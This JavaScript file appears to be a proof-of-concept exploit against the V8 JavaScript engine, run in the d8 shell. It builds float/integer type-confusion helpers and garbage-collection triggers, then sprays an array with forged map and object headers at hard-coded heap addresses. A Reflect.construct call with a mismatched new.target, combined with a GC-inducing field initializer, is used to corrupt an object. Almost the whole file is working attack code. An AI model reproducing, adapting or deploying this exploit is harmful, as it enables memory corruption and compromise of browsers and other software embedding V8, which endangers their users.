// One 8-byte scratch buffer. Every typed view below aliases the same bytes,
// so a value stored through one view can be read back through another
// (bit-level reinterpretation, no numeric conversion).
var buf = new ArrayBuffer(8);
var dv = new DataView(buf);
var u8 = new Uint8Array(buf);
var u32 = new Uint32Array(buf);
var u64 = new BigUint64Array(buf);
var f32 = new Float32Array(buf);
var f64 = new Float64Array(buf);

// Table filled by add_ref(); `index` is the next slot add_ref() writes.
var roots = new Array(0x30000);
var index = 0;
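/**
 * Reinterprets two 32-bit words as one double through the shared scratch buffer.
 *
 * @param {number} l - value stored into u32[0].
 * @param {number} h - value stored into u32[1].
 * @returns {number} f64[0] as read back after both stores.
 */
function pair_u32_to_f64(l, h) {
  u32[0] = l;
  u32[1] = h;
  // The operand must share a line with `return`: a line break after `return`
  // triggers automatic semicolon insertion and the function yields undefined.
  return f64[0];
}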
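/**
 * Reinterprets a 64-bit unsigned integer as a double through the shared scratch buffer.
 *
 * @param {bigint} val - value stored into u64[0] (BigUint64Array accepts BigInt only).
 * @returns {number} f64[0] as read back after the store.
 */
function u64_to_f64(val) {
  u64[0] = val;
  // Operand kept on the `return` line so ASI does not turn this into `return;`.
  return f64[0];
}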
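/**
 * Reinterprets a double as a 64-bit unsigned integer through the shared scratch buffer.
 *
 * @param {number} val - value stored into f64[0].
 * @returns {bigint} u64[0] as read back after the store.
 */
function f64_to_u64(val) {
  f64[0] = val;
  // Operand kept on the `return` line so ASI does not turn this into `return;`.
  return u64[0];
}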
/**
 * Stores a 64-bit value into the shared scratch buffer.
 *
 * @param {bigint} val - value written to u64[0].
 */
function set_u64(val) {
  u64[0] = val;
}
/**
 * Stores a 32-bit value into word 0 of the shared scratch buffer.
 *
 * @param {number} l - value written to u32[0].
 */
function set_l(l) {
  u32[0] = l;
}
/**
 * Stores a 32-bit value into word 1 of the shared scratch buffer.
 *
 * @param {number} h - value written to u32[1].
 */
function set_h(h) {
  u32[1] = h;
}
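/**
 * Reads word 0 of the shared scratch buffer.
 *
 * @returns {number} current value of u32[0].
 */
function get_l() {
  // Operand kept on the `return` line so ASI does not turn this into `return;`.
  return u32[0];
}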
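/**
 * Reads word 1 of the shared scratch buffer.
 *
 * @returns {number} current value of u32[1].
 */
function get_h() {
  // Operand kept on the `return` line so ASI does not turn this into `return;`.
  return u32[1];
}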
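/**
 * Reads the shared scratch buffer as one 64-bit unsigned integer.
 *
 * @returns {bigint} current value of u64[0].
 */
function get_u64() {
  // Operand kept on the `return` line so ASI does not turn this into `return;`.
  return u64[0];
}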
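/**
 * Reads the shared scratch buffer as one double.
 *
 * @returns {number} current value of f64[0].
 */
function get_f64() {
  // Operand kept on the `return` line so ASI does not turn this into `return;`.
  return f64[0];
}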
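/**
 * Stores a double in the shared scratch buffer and returns its 32-bit word 0.
 *
 * @param {number} val - value written to f64[0].
 * @returns {number} u32[0] as read back after the store.
 */
function get_fl(val) {
  f64[0] = val;
  // Operand kept on the `return` line so ASI does not turn this into `return;`.
  return u32[0];
}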
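/**
 * Stores a double in the shared scratch buffer and returns its 32-bit word 1.
 *
 * @param {number} val - value written to f64[0].
 * @returns {number} u32[1] as read back after the store.
 */
function get_fh(val) {
  f64[0] = val;
  // Operand kept on the `return` line so ASI does not turn this into `return;`.
  return u32[1];
}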
/**
 * Appends a reference to the global `roots` table so the object stays reachable.
 *
 * @param {*} obj - value stored at roots[index]; `index` is then advanced by one.
 */
function add_ref(obj) {
  roots[index] = obj;
  index += 1;
}
// Gate read by major_gc() and minor_gc(): while false, both return 1
// without allocating anything.
var gc_flag = false;
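/**
 * When gc_flag is set, allocates and immediately drops one 0x7fe00000-byte
 * ArrayBuffer. The name suggests the allocation is meant to provoke a full
 * garbage collection; nothing in this listing verifies that one happens.
 *
 * @returns {number} 0 when the allocation was made, 1 when gc_flag was false.
 */
function major_gc() {
  if (!gc_flag) {
    return 1;
  }
  new ArrayBuffer(0x7fe00000);
  // Operand kept on the `return` line: with a line break after `return`,
  // ASI makes the function yield undefined instead of 0 / 1.
  return 0;
}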
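/**
 * When gc_flag is set, allocates eight 0x200000-byte ArrayBuffers plus one
 * 8-byte ArrayBuffer and records each of them through add_ref(). The name
 * suggests the allocations are meant to provoke a young-generation collection;
 * nothing in this listing verifies that. Not called anywhere in this listing.
 *
 * @returns {number} 2 when the allocations were made, 1 when gc_flag was false.
 */
function minor_gc() {
  if (!gc_flag) {
    return 1;
  }
  for (let i = 0; i < 8; i++) {
    add_ref(new ArrayBuffer(0x200000));
  }
  add_ref(new ArrayBuffer(8));
  // Operand kept on the `return` line: with a line break after `return`,
  // ASI makes the function yield undefined instead of 2 / 1.
  return 2;
}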
/**
 * Logs a labelled value in hexadecimal, formatted as "<label>: 0x<hex>".
 *
 * @param {string} str - label printed before the value.
 * @param {number|bigint} val - value rendered with toString(16).
 */
function hexx(str, val) {
  const line = str + ": 0x" + val.toString(16);
  console.log(line);
}
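/**
 * Returns a promise that resolves after roughly `ms` milliseconds.
 *
 * @param {number} ms - delay handed to setTimeout.
 * @returns {Promise<void>} resolves with no value once the timer fires.
 */
function sleep(ms) {
  // `return` and the promise must share a line: a line break after `return`
  // makes ASI end the statement, so callers would await undefined.
  return new Promise((resolve) => setTimeout(resolve, ms));
}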
var
spray_array =
new
Array(0xf700).fill(1.1);
var
element_start_addr = 0x00442139;
var
data_element_start_addr = element_start_addr + 7;
var
map_addr = data_element_start_addr + 0x1000;
var
fake_object_addr = map_addr + 0x1000;
var
element_map_addr = fake_object_addr + 0x200;
spray_array[(map_addr - data_element_start_addr) / 8] = pair_u32_to_f64(data_element_start_addr+0x200+1, 0x32040404);
spray_array[(map_addr - data_element_start_addr) / 8 + 1] = u64_to_f64(0x0a0007ff11000842n);
spray_array[(fake_object_addr - data_element_start_addr) / 8] = pair_u32_to_f64(map_addr+1, 0x6cd);
spray_array[(fake_object_addr - data_element_start_addr) / 8 + 1] = pair_u32_to_f64(3, 0x20);
spray_array[(element_map_addr - data_element_start_addr) / 8 + 0] = u64_to_f64(0x61000000000004c5n);
spray_array[(element_map_addr - data_element_start_addr) / 8 + 1] = u64_to_f64(0x004003ff0c0000b1n);
spray_array[(element_map_addr - data_element_start_addr) / 8 + 2] = u64_to_f64(0x0000007d0000007dn);
spray_array[(element_map_addr - data_element_start_addr) / 8 + 3] = u64_to_f64(0x000006dd00000701n);
spray_array[(element_map_addr - data_element_start_addr) / 8 + 3] = u64_to_f64(0x0000000000000000n);
var
str_addr = element_map_addr + 0x100;
spray_array[(str_addr - data_element_start_addr) / 8 + 0] = u64_to_f64(0xd6d6d7e2000003d5n);
spray_array[(str_addr - data_element_start_addr) / 8 + 1] = u64_to_f64(0x0000007000000001n);
print(
"fake_object_addr:"
, pair_u32_to_f64(fake_object_addr+1, fake_object_addr+1));
hexx(
"fake_object_addr"
, fake_object_addr+1);
hexx(
"element_map_addr"
, element_map_addr+1);
var
header = pair_u32_to_f64(element_map_addr+1, 0x40);
var
X = pair_u32_to_f64(str_addr+1, 1);
var
nnn = pair_u32_to_f64(fake_object_addr+1, fake_object_addr+1);
var
debug =
false
;
var
empty_object = {};
// Empty base class: B's parent, and the new.target passed to
// Reflect.construct(B, [], A) further down.
class A {
}
class B extends A {
constructor() {
const check =
new
new
.target;
let v = [
empty_object,empty_object,empty_object,empty_object,
empty_object,empty_object,empty_object,empty_object,
];
super
();
let o = [
header, header, header, header,
X,X,X,X,X,X,X,X,
nnn, nnn, nnn, nnn, nnn, nnn, nnn, nnn,
nnn, nnn, nnn, nnn, nnn, nnn, nnn, nnn,
nnn, nnn, nnn, nnn, nnn, nnn, nnn, nnn,
header, header, header, header,
];
this
.o = o;
this
.v = v;
}
[100] = major_gc();
}
// Warm-up: 200 calls to major_gc(); gc_flag is set only on even iterations,
// so every other call performs the large allocation.
for (let i = 0; i < 200; i++) {
if (i % 2 == 0) gc_flag = true;
major_gc();
gc_flag = false;
}
// Receives the instance constructed on iteration M+3 of the loop below.
var w = null;
// Iteration numbers that steer the loop below. NOTE(review): presumably tuned
// empirically for one build -- nothing in this listing derives them.
const N = 640;
const M = 644;
const S = 650;
// Not referenced anywhere else in this listing.
var block = null;
for (let i = 0; i < S; i++) {
gc_flag = false;
// Explicit major_gc() call on iteration N and on iterations M+1 .. M+3.
if (i == N || (M < i && i < M+4)) {
gc_flag = true;
major_gc();
gc_flag = false;
}
// On iteration M+3 the flag stays set, so the major_gc() call in B's field
// initializer also allocates while that instance is being constructed.
if (i == M+3) {
gc_flag = true;
}
// Constructs B with new.target = A.
let r = Reflect.construct(B, [], A);
if (i == M+3) w = r;
}
// Result check: read the first element of the saved instance's `v`. If that
// throws, dump the object instead. %DebugPrint is V8 natives syntax and only
// parses when d8 is started with --allow-natives-syntax.
try {
print(w.v[0]);
}
catch (m) {
// No property 'p' is assigned anywhere in this listing.
%DebugPrint(w['p']);
%DebugPrint(w);
}
print("END");